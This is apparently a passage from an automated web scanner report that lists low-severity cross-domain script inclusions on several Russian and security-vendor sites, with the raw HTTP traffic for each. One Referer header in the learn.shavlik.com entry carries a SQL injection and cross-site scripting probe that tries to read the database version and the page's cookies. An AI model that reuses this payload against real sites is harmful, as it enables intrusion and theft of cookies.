GET /pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 14:20:17 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 1645

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script src="http://ib.adnxs.com/ab?enc=zczMzMzMCEDNzMzMzMwIQAAAAMDMzAhAzczMzMzMCEDNzMzMzMwIQOtg8QHzcr0bSsYda6b2ziUhg7VNAAAAAC8hAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAJ_Ck8AhwQBAgUCAAQAAAAArylOPgAAAAA.&tt_code=vert-105&udj=uf%28%27a%27%2C+9797%2C+1303741217%29%3Buf%28%27c%27%2C+45814%2C+1303741217%29%3Buf%28%27r%27%2C+173254%2C+1303741217%29%3Bppv%288991%2C+%271998880197657583851%27%2C+1303741217%2C+1303784417%2C+45814%2C+25553%29%3B&cnd=!0xVmYQj25QIQxskKGAAg0ccBKE8xAAAAwMzMCEBCEwgAEAAYACABKP7__________wFIAFAAWP8UYABolgU.&referrer=http://games.webalta.ru/&pp=TbWDIAAIVuAK7GZH3ItXr3JmF2XbbmiM84zMSQ&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB2DbrIIO1TeCtIcfMsQevr63kDdfq-NMBn6CU7BjbxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0xMTM0ODIyNjgyNTEwODc5oAHD8v3sA7IBEGdhbWVzLndlYmFsdGEucnW6AQoxNjB4NjAwX2FzyAEJ2gEYaHR0cDovL2dhbWVzLndlYmFsdGEucnUvmALWEsACBMgChdLPCqgDAegDaegD1AfoA8EC9QMAAADEgAbot86qwY6yhtEB%26num%3D1%26sig%3DAGiWqtyp--SO2lIMceltajJwn2qFCTNn3A%26client%3Dca-pub-1134822682510879%26adurl%3D"></script>
...[SNIP]...

23.13. http://ideco-software.ru/products/ims/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ideco-software.ru
Path:   /products/ims/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /products/ims/?utm_source=dir&utm_medium=cpc&utm_campaign=d1010_mail1&utm_term=mail_ics2&utm_content=10013 HTTP/1.1
Host: ideco-software.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 25 Apr 2011 14:35:59 GMT
Server: Microsoft-IIS/6.0
Connection: Close
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: dv=4/25/2011 6:35:59 PM; expires=Sun, 25-Apr-2021 14:35:59 GMT; path=/
Set-Cookie: Query=/products/ims/index.html?utm_source=dir&utm_medium=cpc&utm_campaign=d1010_mail1&utm_term=mail_ics2&utm_content=10013; expires=Sun, 25-Apr-2021 14:35:59 GMT; path=/
Set-Cookie: FirstVisit=4/25/2011 6:35:59 PM; expires=Sun, 25-Apr-2021 14:35:59 GMT; path=/
Set-Cookie: ASP.NET_SessionId=fkdyl055c3sg0uuma045oy45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=windows-1251
Content-Length: 21815

<html><!-- #BeginTemplate "/Templates/main.dwt" --><!-- DW6 -->
<head>
<script type="text/javascript" src="/dropmenu/jquery.js" />
</script>
<script type="text/javascript" src="/dropmenu/hmenu.js"
...[SNIP]...
</script>
<script src="http://bs.yandex.ru/resource/watch.js" type="text/javascript"></script>
...[SNIP]...

23.14. http://learn.shavlik.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://learn.shavlik.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: learn.shavlik.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=799534; CFTOKEN=57697702; __utmz=225610631.1303732848.1.1.utmgclid=CPC_jKTPt6gCFUh-5QodsROzEA|utmccn=PatchManagement|utmcmd=(not%20set)|utmctr=vulnerability%20management; __utma=225610631.313706594.1303732848.1303732848.1303732848.1; __utmc=225610631; __utmb=225610631.3.10.1303732848

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 25 Apr 2011 12:17:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.9-2
X-Pingback: http://www.oppsource.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8

   <script language = "javascript">
       window.location = 'http://learn.shavlik.com/shavlik/';
   </script>
<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<head>
<meta charset="UTF-8" />
<title>Le
...[SNIP]...
<link rel='stylesheet' id='A2A_SHARE_SAVE-css' href='http://www.oppsource.com/wp-content/plugins/add-to-any/addtoany.min.css?ver=1.3' type='text/css' media='all' />
<script type='text/javascript' src='http://www.oppsource.com/wp-includes/js/comment-reply.js?ver=20090102'></script>
<script type='text/javascript' src='http://www.oppsource.com/wp-includes/js/jquery/jquery.js?ver=1.4.2'></script>
<script type='text/javascript' src='http://www.oppsource.com/wp-content/plugins/google-analyticator/external-tracking.min.js?ver=6.1.1'></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www.oppsource.com/wp-content/themes/oppsource3/style/superfish.css" media="screen">
<script type="text/javascript" src="http://www.oppsource.com/wp-content/themes/oppsource3/script/jquery.js"></script>
<script type="text/javascript" src="http://www.oppsource.com/wp-content/themes/oppsource3/script/hoverIntent.js"></script>
<script type="text/javascript" src="http://www.oppsource.com/wp-content/themes/oppsource3/script/superfish.js"></script>
...[SNIP]...

23.15. http://learn.shavlik.com/shavlik/N  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://learn.shavlik.com
Path:   /shavlik/N

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /shavlik/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: learn.shavlik.com

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Mon, 25 Apr 2011 12:17:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.9-2
X-Pingback: http://www.oppsource.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 12:17:02 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache

   <script language = "javascript">
       window.location = 'http://learn.shavlik.com/shavlik/';
   </script>
   <script language = "javascript">
       window.location = 'http://learn.shavlik.com/shavlik/
...[SNIP]...
<link rel='stylesheet' id='A2A_SHARE_SAVE-css' href='http://www.oppsource.com/wp-content/plugins/add-to-any/addtoany.min.css?ver=1.3' type='text/css' media='all' />
<script type='text/javascript' src='http://www.oppsource.com/wp-includes/js/jquery/jquery.js?ver=1.4.2'></script>
<script type='text/javascript' src='http://www.oppsource.com/wp-content/plugins/google-analyticator/external-tracking.min.js?ver=6.1.1'></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www.oppsource.com/wp-content/themes/oppsource3/style/superfish.css" media="screen">
<script type="text/javascript" src="http://www.oppsource.com/wp-content/themes/oppsource3/script/jquery.js"></script>
<script type="text/javascript" src="http://www.oppsource.com/wp-content/themes/oppsource3/script/hoverIntent.js"></script>
<script type="text/javascript" src="http://www.oppsource.com/wp-content/themes/oppsource3/script/superfish.js"></script>
...[SNIP]...

23.16. http://learn.shavlik.com/shavlik/a  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://learn.shavlik.com
Path:   /shavlik/a

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /shavlik/a HTTP/1.1
Host: learn.shavlik.com
Proxy-Connection: keep-alive
Referer: http://learn.shavlik.com/shavlik/index.cfm?m=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2C(SELECT%20@@VERSION)%2CCHAR(95)%2CCHAR(33)%2CCHAR(64))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))29f68%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E8c4ff1d7709&pg=697&h=0&hp=697&utm_term=vulnerability%20management&utm_campaign=PatchManagement&utm_mt=e&gclid=CPC_jKTPt6gCFUh-5QodsROzEA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=799534; CFTOKEN=57697702; __utmz=225610631.1303732848.1.1.utmgclid=CPC_jKTPt6gCFUh-5QodsROzEA|utmccn=PatchManagement|utmcmd=(not%20set)|utmctr=vulnerability%20management; __utma=225610631.313706594.1303732848.1303732848.1303732848.1; __utmc=225610631; __utmb=225610631.8.10.1303732848

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Mon, 25 Apr 2011 12:45:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.9-2
X-Pingback: http://www.oppsource.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 12:45:36 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache

   <script language = "javascript">
       window.location = 'http://learn.shavlik.com/shavlik/';
   </script>
   <script language = "javascript">
       window.location = 'http://learn.shavlik.com/shavlik/
...[SNIP]...
<link rel='stylesheet' id='A2A_SHARE_SAVE-css' href='http://www.oppsource.com/wp-content/plugins/add-to-any/addtoany.min.css?ver=1.3' type='text/css' media='all' />
<script type='text/javascript' src='http://www.oppsource.com/wp-includes/js/jquery/jquery.js?ver=1.4.2'></script>
<script type='text/javascript' src='http://www.oppsource.com/wp-content/plugins/google-analyticator/external-tracking.min.js?ver=6.1.1'></script>
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www.oppsource.com/wp-content/themes/oppsource3/style/superfish.css" media="screen">
<script type="text/javascript" src="http://www.oppsource.com/wp-content/themes/oppsource3/script/jquery.js"></script>
<script type="text/javascript" src="http://www.oppsource.com/wp-content/themes/oppsource3/script/hoverIntent.js"></script>
<script type="text/javascript" src="http://www.oppsource.com/wp-content/themes/oppsource3/script/superfish.js"></script>
...[SNIP]...

23.17. http://mail.ru/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mail.ru
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: mail.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:24:37 GMT
Server: Apache/1.3.27 (Unix) mru_xml/0.471 gorgona/2.1 mod_jk/1.2.4 mod_ruby/1.0.7 Ruby/1.6.8 mod_mrim/0.17
Connection: close
Set-Cookie: Mpopl=721425857; expires=Mon, 25 Apr 2011 14:39:37 GMT; path=/; domain=.mail.ru
Set-Cookie: mrcu=D5824DB584250497422EF3D6C1AD; expires=Thu, 22 Apr 2021 14:24:37 GMT; path=/; domain=.mail.ru
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: Sun, 25 Apr 2010 14:24:37 GMT
Last-Modified: Mon, 25 Apr 2011 18:24:37 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
Content-Length: 114440


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru" lang="ru">
<head
...[SNIP]...
<link href="http://limg.imgsmail.ru/mail/ru/css/go_search.css?16" rel="stylesheet" type=text/css>
<script language="javascript" src="http://limg.imgsmail.ru/r/js/splash.js?7" type="text/javascript" charset="windows-1251"></script>
...[SNIP]...
</script>


<script language="javascript" src="http://limg.imgsmail.ru/r/js/blogs/tooltiplib.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script language="javascript" src="http://limg.imgsmail.ru/r/js/blogs/tooltiplib.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script src="https://auth.mail.ru/https.js?1464913075" type="text/javascript" language="javascript"></script>
...[SNIP]...

23.18. http://nguard.com/about.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nguard.com
Path:   /about.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about.aspx HTTP/1.1
Host: nguard.com
Proxy-Connection: keep-alive
Referer: http://nguard.com/vulnerability-assessment/?gclid=CM2C9p3Pt6gCFUOo4AoduRviBQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=74935565.1303735966.2.2.utmgclid=CM2C9p3Pt6gCFUOo4AoduRviBQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=74935565.1810353086.1303732835.1303732835.1303735966.2; __utmc=74935565; __utmb=74935565.1.10.1303735966

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:09:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 17091


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<!-- InstanceBegin codeOutsi
...[SNIP]...
</script> -->
<script src="http://maps.google.com/maps?file=api&amp;v=2&amp;key=ABQIAAAAp8z1VNE38srOQ1o5fXDRARSx6ctTO5fMIZE3YB6iT47nOM1iYBROmuKbl_gd95IJK_VjcpR2iBGfSw" type="text/javascript"></script>
...[SNIP]...

23.19. http://nguard.com/contact.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nguard.com
Path:   /contact.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /contact.aspx HTTP/1.1
Host: nguard.com
Proxy-Connection: keep-alive
Referer: http://nguard.com/about.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=74935565.1303735966.2.2.utmgclid=CM2C9p3Pt6gCFUOo4AoduRviBQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=74935565.1810353086.1303732835.1303732835.1303735966.2; __utmc=74935565; __utmb=74935565.2.10.1303735966

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:09:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12825


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<!-- InstanceBegin codeOutsi
...[SNIP]...
</script> -->
<script src="http://maps.google.com/maps?file=api&amp;v=2&amp;key=ABQIAAAAp8z1VNE38srOQ1o5fXDRARSx6ctTO5fMIZE3YB6iT47nOM1iYBROmuKbl_gd95IJK_VjcpR2iBGfSw" type="text/javascript"></script>
...[SNIP]...

23.20. http://nguard.com/vulnerability-assessment/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nguard.com
Path:   /vulnerability-assessment/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /vulnerability-assessment/?gclid=CM2C9p3Pt6gCFUOo4AoduRviBQ HTTP/1.1
Host: nguard.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=74935565.1303732835.1.1.utmgclid=CM2C9p3Pt6gCFUOo4AoduRviBQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=74935565.1810353086.1303732835.1303732835.1303732835.1; __utmc=74935565

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:52:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 19622


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta http-equiv="
...[SNIP]...
</script>

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

23.21. http://odnoklassniki.ru/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://odnoklassniki.ru
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: odnoklassniki.ru
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: CHECK_COOKIE=true; Domain=.odnoklassniki.ru; Expires=Mon, 25-Apr-2011 14:27:36 GMT; Path=/
Cache-Control: no-cache
Cache-Control: no-store
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Rendered-Blocks: HtmlPage
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 25 Apr 2011 14:26:36 GMT
Content-Length: 13753

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head><title>..........................</title>
<meta http-equiv="Content-Type" con
...[SNIP]...
<div class="hook"><script src="http://stg.odnoklassniki.ru/res/js/flashdetect.js" type="text/javascript" onload="try{ document.getElementById('field_flashVer').value=GetSwfVer();} catch(e) {}"></script>
...[SNIP]...

23.22. http://pda.loveplanet.ru/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pda.loveplanet.ru
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: pda.loveplanet.ru
Proxy-Connection: keep-alive
Referer: http://my.webalta.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:51:44 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: domhit=1; path=/; expires=Mon, 02-May-2011 14:51:44 GMT; domain=.pda.loveplanet.ru
Set-Cookie: affiliate_reff=http%3A%2F%2Fmy.webalta.ru%2F; path=/; expires=Tue, 24-Apr-2012 14:51:44 GMT; domain=.pda.loveplanet.ru
Set-Cookie: randomhit=1698142961; path=/; expires=Tue, 24-Apr-2012 14:51:44 GMT; domain=.pda.loveplanet.ru
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 25 Apr 2011 14:51:44 GMT
Content-Length: 11125

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<title>.................... LovePlanet.ru. .......... .............. .. .........
...[SNIP]...
<link href="http://css.loveplanet.ru/3/img/pda/main.css" rel="stylesheet" type="text/css">
<script src='http://css.loveplanet.ru/3/img/pda/main.js' type='text/javascript'></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://css.loveplanet.ru/3/imgstc/xgemius/xgemius.js"></script>
...[SNIP]...

23.23. http://pixel.fetchback.com/serve/fb/pdc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /serve/fb/pdc

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /serve/fb/pdc?cat=&name=landing&sid=719 HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/page_not_found.shtml
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cmp=1_1303742441_10164:0_10638:0_10640:0_10641:0_1437:0_1660:562769; uid=1_1303742441_1303179323923:6792170478871670; kwd=1_1303742441_11317:0_11717:0_11718:0_11719:0; sit=1_1303742441_719:0:0_2451:50869:45769_3236:208832:208714_782:563118:562769; cre=1_1303742441; bpd=1_1303742441; apd=1_1303742441; scg=1_1303742441; ppd=1_1303742441; afl=1_1303742441

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:41:11 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cmp=1_1303742471_10164:0_10638:0_10640:0_10641:0_1437:0_1660:562799; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: uid=1_1303742471_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: kwd=1_1303742471_11317:0_11717:0_11718:0_11719:0; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: sit=1_1303742471_719:30:0_2451:50899:45799_3236:208862:208744_782:563148:562799; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: cre=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: bpd=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: apd=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: scg=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: ppd=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Set-Cookie: afl=1_1303742471; Domain=.fetchback.com; Expires=Sat, 23-Apr-2016 14:41:11 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 25 Apr 2011 14:41:11 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 4418

<!-- campaign #1437 is eligible -->
<![if !IE 6]>
<script language='javascript' type='text/javascript'>
function timeout(){location.replace('http://pixel.fetchback.com/timeout.html');}
setTimeout(time
...[SNIP]...
<!-- "Net Suite" c/o "FetchBack", segment: 'Net Suite Retargeting' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<script src="http://segment-pixel.invitemedia.com/pixel?pixelID=6551&partnerID=91&clientID=1838&key=segment&returnType=js"></script>
...[SNIP]...
<!-- "NetSuite AU" c/o "FetchBack", segment: 'NetSuiteAU Retargeting' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<script src="http://segment-pixel.invitemedia.com/pixel?pixelID=13893&partnerID=91&clientID=2693&key=segment&returnType=js"></script>
...[SNIP]...
<!-- "NetSuite Singapore" c/o "FetchBack", segment: 'NetSuite Sing Retargeting' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<script src="http://segment-pixel.invitemedia.com/pixel?pixelID=13899&partnerID=91&clientID=2695&key=segment&returnType=js"></script>
...[SNIP]...
<!-- "NetSuite UK" c/o "FetchBack", segment: 'NetSuite UK Retargeting' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
<script src="http://segment-pixel.invitemedia.com/pixel?pixelID=13896&partnerID=91&clientID=2694&key=segment&returnType=js"></script>
...[SNIP]...
<!-- "NetSuite HonKong" c/o "FetchBack", segment: 'NetSuite HonKong Retargeting' - DO NOT MODIFY THIS PIXEL IN ANY WAY -->
